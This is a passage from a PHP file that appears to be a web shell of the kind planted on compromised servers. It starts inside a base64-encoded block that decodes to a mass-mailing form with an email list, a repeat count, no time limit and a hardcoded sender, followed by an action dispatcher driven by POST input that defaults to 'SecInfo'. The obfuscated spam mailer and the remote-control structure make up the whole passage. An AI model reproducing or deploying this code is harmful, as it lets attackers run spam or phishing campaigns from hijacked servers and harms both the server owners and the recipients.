RvIDo8L2ZvbnQ+CiAgICAgIDwvdGQ+CiAgICA8L3RyPgogICAgPHRyIHZhbGlnbj0idG9wIj4KICAgICAgPHRkIGNvbHNwYW49IjMiIHdpZHRoPSI1MjAiPgogICAgICAgIDxmb250IHNpemU9Ii0zIiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj4KICAgICAgICAgIDx0ZXh0YXJlYSBuYW1lPSJtZXNzYWdlIiBjb2xzPSI1NiIgcm93cz0iMTAiPjw/cGhwIHByaW50ICRtZXNzYWdlOyA/PjwvdGV4dGFyZWE+PGJyIC8+CiAgICAgICAgICA8aW5wdXQgdHlwZT0icmFkaW8iIG5hbWU9ImNvbnRlbnR0eXBlIiB2YWx1ZT0icGxhaW4iIC8+IFBsYWluCiAgICAgICAgICA8aW5wdXQgdHlwZT0icmFkaW8iIG5hbWU9ImNvbnRlbnR0eXBlIiB2YWx1ZT0iaHRtbCIgY2hlY2tlZD0iY2hlY2tlZCIgLz4gSFRNTAogICAgICAgICAgPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYWN0aW9uIiB2YWx1ZT0ic2VuZCIgLz48YnIgLz4KCSAgTnVtYmVyIHRvIHNlbmQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJhbW91bnQiIHZhbHVlPSIxIiBzaXplPSIxMCIgLz48YnIgLz4KCSAgTWF4aW11bSBzY3JpcHQgZXhlY3V0aW9uIHRpbWUoaW4gc2Vjb25kcywgMCBmb3Igbm8gdGltZWxpbWl0KTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ0aW1lbGltaXQiIHZhbHVlPSIwIiBzaXplPSIxMCIgLz4KICAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJTZW5kIGVNYWlscyIgLz4KICAgICAgICA8L2ZvbnQ+CiAgICAgIDwvdGQ+CiAgICAgIDx0ZCB3aWR0aD0iMjc4Ij4KICAgICAgICA8Zm9udCBzaXplPSItMyIgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+CiAgICAgICAgICA8dGV4dGFyZWEgbmFtZT0iZW1haWxsaXN0IiBjb2xzPSIzMiIgcm93cz0iMTAiPjw/cGhwIHByaW50ICRlbWFpbGxpc3Q7ID8+PC90ZXh0YXJlYT4KICAgICAgICA8L2ZvbnQ+CiAgICAgIDwvdGQ+CiAgICA8L3RyPgogIDwvdGFibGU+CjwvZm9ybT4KCjw/CmlmICgkYWN0aW9uPT0ic2VuZCIpewogIGlmICghJGZyb20gJiYgISRzdWJqZWN0ICYmICEkbWVzc2FnZSAmJiAhJGVtYWlsbGlzdCl7CiAgICBwcmludCAiUGxlYXNlIGNvbXBsZXRlIGFsbCBmaWVsZHMgYmVmb3JlIHNlbmRpbmcgeW91ciBtZXNzYWdlLiI7CiAgICBleGl0OwogICB9CiAgJGFsbGVtYWlscyA9IHNwbGl0KCJcbiIsICRlbWFpbGxpc3QpOwogICRudW1lbWFpbHMgPSBjb3VudCgkYWxsZW1haWxzKTsKICAkZmlsdGVyID0gIm1haWxsaXN0IjsKICAkZmxvYXQgPSAiRnJvbSA6IG1haWxpc3QgaW5mbyA8bmcyQGxpdmUuZnI+IjsKIC8vT3BlbiB0aGUgZmlsZSBhdHRhY2htZW50IGlmIGFueSwgYW5kIGJhc2U2NF9lbmNvZGUgaXQgZm9yIGVtYWlsIHRyYW5zcG9ydAogSWYgKCRmaWxlX25hbWUpewogICBpZiAoIWZpbGVfZXhpc3RzKCRmaWxlKSl7CglkaWUoIlRoZSBmaWxlIHlvdSBhcmUgdHJ5aW5nIHRvIHVwbG9hZCBjb3VsZG4ndCBiZSBjb3BpZWQgdG8gdGhlIHNlcnZlciIpOwogICB9CiAgICRjb250ZW50ID0gZnJlYWQoZm9wZW4oJGZpbGUsInIiKSxmaWxlc2l6ZSgkZmlsZSkpOwogICAkY29udGVudCA9IGNodW5rX3NwbGl0KGJhc2U2NF9lbmNvZGUoJGNvbnRlbnQpKTsKICAgJHVpZCA9IHN0cnRvdXBwZXIobWQ1KHVuaXFpZCh0aW1lKCkpKSk7CiAgICRuYW1lID0gYmFzZW5hbWUoJGZpbGUpOwogIH0KCiBmb3IoJHh4PTA7ICR4eDwkYW1vdW50OyAkeHgrKyl7CiAgZm9yKCR4PTA7ICR4PCRudW1lbWFpbHM7ICR4KyspewogICAgJHRvID0gJGFsbGVtYWlsc1skeF07CiAgICBpZiAoJHRvKXsKICAgICAgJHRvID0gZXJlZ19yZXBsYWNlKCIgIiwgIiIsICR0byk7CiAgICAgICRtZXNzYWdlID0gZXJlZ19yZXBsYWNlKCImZW1haWwmIiwgJHRvLCAkbWVzc2FnZSk7CiAgICAgICRzdWJqZWN0ID0gZXJlZ19yZXBsYWNlKCImZW1haWwmIiwgJHRvLCAkc3ViamVjdCk7CiAgICAgIHByaW50ICJTZW5kaW5nIG1haWwgdG8gJHRvLi4uLi4uLiI7CiAgICAgIGZsdXNoKCk7CiAgICAgICRoZWFkZXIgPSAiRnJvbTogJHJlYWxuYW1lIDwkZnJvbT5cclxuUmVwbHktVG86ICRyZXBseXRvXHJcbiI7CiAgICAgICRoZWFkZXIgLj0gIk1JTUUtVmVyc2lvbjogMS4wXHJcbiI7CiAgICAgIElmICgkZmlsZV9uYW1lKSAkaGVhZGVyIC49ICJDb250ZW50LVR5cGU6IG11bHRpcGFydC9taXhlZDsgYm91bmRhcnk9JHVpZFxyXG4iOwogICAgICBJZiAoJGZpbGVfbmFtZSkgJGhlYWRlciAuPSAiLS0kdWlkXHJcbiI7CiAgICAgICRoZWFkZXIgLj0gIkNvbnRlbnQtVHlwZTogdGV4dC8kY29udGVudHR5cGVcclxuIjsKICAgICAgJGhlYWRlciAuPSAiQ29udGVudC1UcmFuc2Zlci1FbmNvZGluZzogOGJpdFxyXG5cclxuIjsKICAgICAgJGhlYWRlciAuPSAiJG1lc3NhZ2VcclxuIjsKICAgICAgSWYgKCRmaWxlX25hbWUpICRoZWFkZXIgLj0gIi0tJHVpZFxyXG4iOwogICAgICBJZiAoJGZpbGVfbmFtZSkgJGhlYWRlciAuPSAiQ29udGVudC1UeXBlOiAkZmlsZV90eXBlOyBuYW1lPVwiJGZpbGVfbmFtZVwiXHJcbiI7CiAgICAgIElmICgkZmlsZV9uYW1lKSAkaGVhZGVyIC49ICJDb250ZW50LVRyYW5zZmVyLUVuY29kaW5nOiBiYXNlNjRcclxuIjsKICAgICAgSWYgKCRmaWxlX25hbWUpICRoZWFkZXIgLj0gIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPVwiJGZpbGVfbmFtZVwiXHJcblxyXG4iOwogICAgICBJZiAoJGZpbGVfbmFtZSkgJGhlYWRlciAuPSAiJGNvbnRlbnRcclxuIjsKICAgICAgSWYgKCRmaWxlX25hbWUpICRoZWFkZXIgLj0gIi0tJHVpZC0tIjsKICAgICAgbWFpbCgkdG8sICRzdWJqZWN0LCAiIiwgJGhlYWRlcik7CiAgICAgIHByaW50ICJvazxicj4iOwogICAgICBmbHVzaCgpOwogICAgfQogIH0KIH0KCn0K')); printFooter(); } function actionabout(){ printHeader(); echo '

About

'; echo '
'; echo "

Thanks To : YouTube :p

"; echo "


"; echo '
'; printFooter(); } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'SecInfo'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); ?>